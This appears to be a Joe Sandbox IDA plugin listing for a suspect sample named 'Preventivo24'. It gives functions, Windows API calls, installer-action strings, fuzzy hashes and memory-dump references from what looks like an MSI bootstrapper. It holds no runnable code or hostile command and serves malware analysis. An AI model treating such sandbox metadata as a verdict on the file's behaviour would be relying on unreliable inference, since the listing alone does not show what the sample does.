RemoveFiles, xrefs: 00E8591D, 00E85A63
MsiAssembly, xrefs: 00E86D86
AI_DefaultActionCost, xrefs: 00E878D1
PatchSize, xrefs: 00E86195
InstallValidate, xrefs: 00E83AB1
RemoveRegistryValues, xrefs: 00E84B1B, 00E84C61
Patch, xrefs: 00E8611B
Options, xrefs: 00E870C0, 00E87146
AppId, xrefs: 00E84E0D, 00E8644A
RegisterExtensionInfo, xrefs: 00E864A1
15000, xrefs: 00E8411E, 00E84264, 00E85E5C, 00E8622E, 00E864B4, 00E86BE1, 00E86DF0
AI_UserAccounts, xrefs: 00E87309, 00E875F7
AI_ProcessAccounts, xrefs: 00E875D1
InstallFinalize, xrefs: 00E86ED7
AI_UninstallGroups, xrefs: 00E87360
UnpublishComponents, xrefs: 00E83E66
8000, xrefs: 00E8450B, 00E84A08, 00E867C3, 00E86A58
30000, xrefs: 00E83D58, 00E866B7, 00E86D73
Component, xrefs: 00E83769, 00E839DD, 00E83B28, 00E83C51
ODBCDataSource, xrefs: 00E84669, 00E86853
AI_ChainProductsPseudo, xrefs: 00E877D7
3000, xrefs: 00E83C1E, 00E83E92, 00E83FD8, 00E843AA, 00E84B4E, 00E84C94, 00E84DDA, 00E84F20, 00E85066, 00E851AC, 00E856C4, 00E86437, 00E865AE, 00E869D2, 00E86AD5
RemoveRegistry, xrefs: 00E84CC7
UnregisterProgIdInfo, xrefs: 00E85033
Location, xrefs: 00E86FB4, 00E8703A
MsiUnpublishAssemblies, xrefs: 00E83D25
PatchFiles, xrefs: 00E860B5
800, xrefs: 00E83AE4
AI_ExtractPrereq, xrefs: 00E86FDA
6000, xrefs: 00E86631
FileSize, xrefs: 00E8604F
3000000, xrefs: 00E8673D
IniFile, xrefs: 00E8546B, 00E866C5
12000, xrefs: 00E84636, 00E8477C, 00E848C2, 00E8580A, 00E85950, 00E85AB1, 00E85BD0, 00E85D16, 00E863B1, 00E86840, 00E868C6, 00E8694C
MoveFile, xrefs: 00E85E8F
SelfRegModules, xrefs: 00E86A45
Complus, xrefs: 00E843DD, 00E86AE8
Feature, xrefs: 00E8400B, 00E86E03
AI_PreRequisite, xrefs: 00E86F7A, 00E87000, 00E87086, 00E8710C
AI_DownloadPrereq, xrefs: 00E86F54
1800, xrefs: 00E8717F, 00E876DE
RegisterFonts, xrefs: 00E867B0
AI_XmlUninstall, xrefs: 00E876CB, 00E87751
MoveFiles, xrefs: 00E85E29
CreateFolders, xrefs: 00E85CE3
CreateShortcuts, xrefs: 00E8639E
AI_InstallPrerequisite, xrefs: 00E87060
100, xrefs: 00E860E8, 00E86531, 00E8746D
SelfReg, xrefs: 00E84523, 00E86A6B
200000, xrefs: 00E86E6D
MsiConfigureServices, xrefs: 00E86BCE, 00E86BF4
AI_UninstallTasks, xrefs: 00E873DD
Registry, xrefs: 00E84B81, 00E86644
Shortcut, xrefs: 00E855BB, 00E863C4
Environment, xrefs: 00E856F7, 00E86750

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$800$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$AppSearch$BindImage$Complus$Component$Component_$CostFinalize$CostInitialize$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileCost$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$InstallValidate$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProcessComponents$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveExistingProducts$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveODBC$RemoveRegistry$RemoveRegistryValues$RemoveShortcuts$SelfReg$SelfRegModules$SelfUnregModules$ServiceControl$ServiceInstall$Shortcut$StartServices$StopServices$TypeLib$UnpublishComponents$UnpublishFeatures$UnregisterClassInfo$UnregisterComPlus$UnregisterExtensionInfo$UnregisterFonts$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
API String ID: 0-2910470256
Opcode ID: a8e31b566961664872a0159ab1687c323801ade37eba7ea704e1bd472b538bcc
Instruction ID: e4140d683bfd0138280084887194e754e29e251d5719d5d569cffbace388f197
Opcode Fuzzy Hash: a8e31b566961664872a0159ab1687c323801ade37eba7ea704e1bd472b538bcc
Instruction Fuzzy Hash: 11737F20E473C4EAD36CEBB5AA0635E3A61AB66705F64934CF0693B2C6DBF505C4C391

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2743 Relevance: 64.7, APIs: 25, Strings: 11, Instructions: 1661memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

VariantClear.OLEAUT32(?), ref: 00EB2A23
VariantClear.OLEAUT32(?), ref: 00EB2B7E
VariantClear.OLEAUT32(?), ref: 00EB2BB3
VariantClear.OLEAUT32(?), ref: 00EB2D48
SysAllocString.OLEAUT32(00000000), ref: 00EB2D59
VariantClear.OLEAUT32(?), ref: 00EB2DA3
VariantClear.OLEAUT32(?), ref: 00EB2DCC
SysFreeString.OLEAUT32(00000000), ref: 00EB2DD7
VariantClear.OLEAUT32(?), ref: 00EB2EF5
VariantClear.OLEAUT32(?), ref: 00EB2F2A
VariantClear.OLEAUT32(?), ref: 00EB2F84
VariantClear.OLEAUT32(?), ref: 00EB3043
VariantClear.OLEAUT32(?), ref: 00EB29F1

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

VariantClear.OLEAUT32(?), ref: 00EB2B11
VariantClear.OLEAUT32(?), ref: 00EB2B46
VariantClear.OLEAUT32(?), ref: 00EB31BA
SysAllocString.OLEAUT32(00000000), ref: 00EB31CB
VariantClear.OLEAUT32(?), ref: 00EB3215
VariantClear.OLEAUT32(?), ref: 00EB323E
SysFreeString.OLEAUT32(00000000), ref: 00EB3249
VariantClear.OLEAUT32(?), ref: 00EB334C
VariantClear.OLEAUT32(?), ref: 00EB33A3
VariantClear.OLEAUT32(?), ref: 00EB33CC
SysFreeString.OLEAUT32(00000000), ref: 00EB33DA

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Strings

MsiResolveFormatted, xrefs: 00EB36B7
MsiSetProperty, xrefs: 00EB3480
GetFontHeight, xrefs: 00EB3BF0
MsiGetBinaryPath, xrefs: 00EB3776
MessageBox, xrefs: 00EB39B3
MsiPublishEvents, xrefs: 00EB38F4
MsiEvaluateCondition, xrefs: 00EB35F8
MsiGetBinaryPathIndirect, xrefs: 00EB3835
MsiGetBytesCountText, xrefs: 00EB3A72
MsiGetFormattedError, xrefs: 00EB3B31
MsiGetProperty, xrefs: 00EB3539

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ClearVariant$String$Free$AllocHeap$AllocateFindProcessResource
String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
API String ID: 2653467708-3153392536
Opcode ID: 207895625b49c8a2124a0a867c0d46dea06dab8f3d981193eccf8125a64a8b11
Instruction ID: 9c494357b5a87331a3846cf073eb2e070f698e587469ba5bca8e8893906f3661
Opcode Fuzzy Hash: 207895625b49c8a2124a0a867c0d46dea06dab8f3d981193eccf8125a64a8b11
Instruction Fuzzy Hash: B0E28C71D10249DFDB14DFB8C8457EEBBB0BF48314F24925AE919B7291EB34AA85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FF6910 Relevance: 39.0, APIs: 14, Strings: 8, Instructions: 524fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(011D00A4,C0000000,00000003,00000000,00000004,00000080,00000000,B5580983,-00000001,011D0098,011D0080), ref: 00FF6985
GetLastError.KERNEL32 ref: 00FF69AD
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00FF6A32
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 00FF6B62
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 00FF6BFE
WriteFile.KERNEL32(00000000,011CF558,00000000,00000002,00000000,?,0000001D), ref: 00FF6D75
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00FF6D7E

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,011456A4,00000002), ref: 00FF6E34
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00FF6E3D
WriteFile.KERNEL32(00000000,?,00000000,00000002,00000000,011456A4,00000002), ref: 00FF6EE9
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001D), ref: 00FF6EF2

Strings

LOGGER->Reusing LOG file at:, xrefs: 00FF6B07, 00FF6B19, 00FF6B23
x64, xrefs: 00FF6DCE, 00FF6DDA
LOGGER->Creating LOG file at:, xrefs: 00FF6C46, 00FF6C58, 00FF6C62
LOGGER->failed to create LOG at:, xrefs: 00FF69ED, 00FF69FF, 00FF6A09
x86, xrefs: 00FF6DC5
server, xrefs: 00FF6DE0, 00FF6DE8
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 00FF6E04
workstation, xrefs: 00FF6DDB

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorHeapLastPointerProcess
String ID: LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
API String ID: 2331954151-4230748128
Opcode ID: a973a14a13a57e2f40f6776386ae0e6277169159e28db69a58e851d0b8eb729a
Instruction ID: 340e3ab90436bb6ccf182fa2cb9b2cc45fe00386af0c2504a58d831cc76bd2fc
Opcode Fuzzy Hash: a973a14a13a57e2f40f6776386ae0e6277169159e28db69a58e851d0b8eb729a
Instruction Fuzzy Hash: CF128B31A006099BDB14DF68C945B7DBBB6FF48320F184269E925EB3D1DB34AD02DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2BA0 Relevance: 22.1, APIs: 5, Strings: 7, Instructions: 1113stringsleepCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3003
lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3183
std::_Throw_Cpp_error.LIBCPMT ref: 00EC37E4

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?, ?(-|/)+q,01147316,?), ref: 00EC3740

Part of subcall function 00EA5220: FindClose.KERNEL32(00000000), ref: 00EA536F

Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45

std::_Throw_Cpp_error.LIBCPMT ref: 00EC3AB7

Strings

appx, xrefs: 00EC319E
Launching file:, xrefs: 00EC2C5B
msixbundle, xrefs: 00EC3022
?(-|/)+q, xrefs: 00EC2D3C
msix, xrefs: 00EC2ED1
Return code of launched file:, xrefs: 00EC368B
Launch failed. Error:, xrefs: 00EC358B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Cpp_errorThrow_lstrcmpistd::_$CloseErrorFindFormatHeapLastMessageProcessSleep
String ID: ?(-|/)+q$Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
API String ID: 2536901295-140134217
Opcode ID: 541bc7a6eb4256b999df438e0ccccedf7d558e970e9c291e1a22f879761ad5bb
Instruction ID: 9300c3bbb3bd92ad2b93dc561052d49b9dcb8124d33e24cef6fc386170e2ae8a
Opcode Fuzzy Hash: 541bc7a6eb4256b999df438e0ccccedf7d558e970e9c291e1a22f879761ad5bb
Instruction Fuzzy Hash: 93A2BC71D00218CFDB24DF68C945BADB7B1AF44318F24829DE819B7281DB75AE86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3390 Relevance: 21.6, APIs: 14, Instructions: 596windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00EA3465
ShowWindow.USER32(?,00000000), ref: 00EA3484
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EA3492
GetWindowRect.USER32(?,?), ref: 00EA34A9
ShowWindow.USER32(?,00000000), ref: 00EA34CA
SetWindowLongW.USER32(00000000,000000EB,?), ref: 00EA34E1

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

ShowWindow.USER32(?,?,?,00000000), ref: 00EA368D
GetWindowLongW.USER32(?,000000EB), ref: 00EA36C1
ShowWindow.USER32(?,?,?,00000000), ref: 00EA36DF
GetWindowRect.USER32(?,?), ref: 00EA3709
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00EA3898
GetWindowRect.USER32(?,?), ref: 00EA3949
GetWindowRect.USER32(?,?), ref: 00EA3994
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00EA39D2

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$LongRectShow$MessageSend$AllocateHeap
String ID:
API String ID: 2680428312-0
Opcode ID: 0a8e423aa687ccd09dffa5e919d2fc26813ad287ae8b9135c9c9b42e1cceabf7
Instruction ID: ab012dc66abbbec873e47ffbcbfe4fa5c5dafe8f5ccf30b3947690a8daac41f4
Opcode Fuzzy Hash: 0a8e423aa687ccd09dffa5e919d2fc26813ad287ae8b9135c9c9b42e1cceabf7
Instruction Fuzzy Hash: EE328A71A04205AFCB25CF68D484AAEBBF5BF8D304F10555DF855AB260DB30FA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E98520 Relevance: 21.4, APIs: 14, Instructions: 411memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E98A00: EnterCriticalSection.KERNEL32(011D536C,B5580983,00000000,?,?,?,?,?,?,00E98169,010B530D,000000FF), ref: 00E98A3D
Part of subcall function 00E98A00: LoadCursorW.USER32(00000000,00007F00), ref: 00E98AB8
Part of subcall function 00E98A00: LoadCursorW.USER32(00000000,00007F00), ref: 00E98B60

SysFreeString.OLEAUT32(00000000), ref: 00E985E0
SysAllocString.OLEAUT32(00000000), ref: 00E9861B
GetWindowLongW.USER32(?,000000EC), ref: 00E986E9
GetWindowLongW.USER32(?,000000EC), ref: 00E986F9
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E98708
NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E98169,00000000), ref: 00E9871A
GetWindowLongW.USER32(?,000000EB), ref: 00E98728
SetWindowTextW.USER32(?,01142730), ref: 00E987DA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00E9880B
GlobalLock.KERNEL32(00000000), ref: 00E98819
GlobalUnlock.KERNEL32(?), ref: 00E9886B
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00E98901
SysFreeString.OLEAUT32(00000000), ref: 00E98924
SysFreeString.OLEAUT32(00000000), ref: 00E98993

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Long$String$FreeGlobal$AllocCursorLoad$CriticalEnterLockNtdllProc_SectionTextUnlock
String ID:
API String ID: 3547321447-0
Opcode ID: 4d1fa6c9f221f356ea3d1d2e17b00625fb1a4aee31ae1b60d57e5eb5e2506c3b
Instruction ID: 0d44abdb8db40505b0229c927e31d54a192cb82395000851bf1023165f967cf4
Opcode Fuzzy Hash: 4d1fa6c9f221f356ea3d1d2e17b00625fb1a4aee31ae1b60d57e5eb5e2506c3b
Instruction Fuzzy Hash: B2E1C271A01209AFDF14DFA8C944BAEBBB9AF4A314F140169E815F73A0DB759D40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EBF740 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 930windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EBF797

Strings

`Dialog_`=', xrefs: 00EBF8F4
AiTabPage, xrefs: 00EBF9C6, 00EBFB1F
Dialog, xrefs: 00EBFFB2, 00EBFFDA, 00EC0178, 00EC01A5, 00EC01CD
SpawnDialog, xrefs: 00EBFEDD
ControlEvent, xrefs: 00EBFA3A
Title, xrefs: 00EBFF73
' AND `Control_`=', xrefs: 00EBF93D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend
String ID: ' AND `Control_`='$AiTabPage$ControlEvent$Dialog$SpawnDialog$Title$`Dialog_`='
API String ID: 3850602802-1412757306
Opcode ID: b51c3c3db08a9123dd761a14a24c49b8839cda1ae5a3dc9048df81b4d121ef5d
Instruction ID: b00f465eda617d50c7d072ae56e3bc1a1c2e9c778f0d399ab3f820d5a922acef
Opcode Fuzzy Hash: b51c3c3db08a9123dd761a14a24c49b8839cda1ae5a3dc9048df81b4d121ef5d
Instruction Fuzzy Hash: 6D829B71E00258CFCB18DF68C954BEEBBB1BF58304F144299E849B7391DB74AA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3750 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

GetStdHandle.KERNEL32(000000F5,?,B5580983,?,?), ref: 00FC3B47
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 00FC3B4E
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 00FC3B62
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00FC3B69
GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,011456A4,00000002,?,?), ref: 00FC3C22
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 00FC3C29
IsWindow.USER32(00000000), ref: 00FC3EC8

Strings

Error, xrefs: 00FC3E5B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ConsoleHandle$AttributeExclusiveLockText$AcquireBufferInfoReleaseScreenWindow
String ID: Error
API String ID: 2349801371-2619118453
Opcode ID: 2e8c13a1cbcba9289adbd6d44d2d7d8442f8cd75327e4513a731aac53fafb5ab
